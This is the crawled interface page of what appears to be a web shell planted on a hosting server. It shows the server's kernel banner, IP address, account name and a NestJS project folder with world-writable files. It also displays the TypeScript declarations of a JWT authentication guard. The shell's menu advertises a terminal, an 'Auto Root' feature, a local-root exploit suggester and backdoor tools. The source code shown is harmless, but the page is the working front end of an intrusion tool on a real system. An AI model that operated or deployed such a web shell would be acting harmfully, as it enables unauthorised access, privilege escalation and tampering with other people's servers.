Linux sg77.dns-private.com 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
LiteSpeed
Server IP : 135.181.230.13 & Your IP : 216.73.217.69
Domains :
Cant Read [ /etc/named.conf ]
User : pilasate
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
pilasate /
test /
dist /
common /
guards /
Delete
Unzip
Name
Size
Permission
Date
Action
jwt-auth.guard.d.ts
585
B
-rw-rw-rw-
2025-03-22 07:46
jwt-auth.guard.js
3.06
KB
-rw-rw-rw-
2025-03-22 07:46
jwt-auth.guard.js.map
1.58
KB
-rw-rw-rw-
2025-03-22 07:46
roles.guard.d.ts
427
B
-rw-rw-rw-
2025-03-22 07:46
roles.guard.js
1.76
KB
-rw-rw-rw-
2025-03-22 07:46
roles.guard.js.map
760
B
-rw-rw-rw-
2025-03-22 07:46
Save
Rename
import { ExecutionContext } from '@nestjs/common'; import { Reflector } from '@nestjs/core'; import { AuthService } from '../../modules/auth/auth.service'; declare const JwtAuthGuard_base: import("@nestjs/passport").Type<import("@nestjs/passport").IAuthGuard>; export declare class JwtAuthGuard extends JwtAuthGuard_base { private readonly authService; private readonly reflector; constructor(authService: AuthService, reflector: Reflector); canActivate(context: ExecutionContext): Promise<boolean>; handleRequest(err: any, user: any, info: any): any; } export {};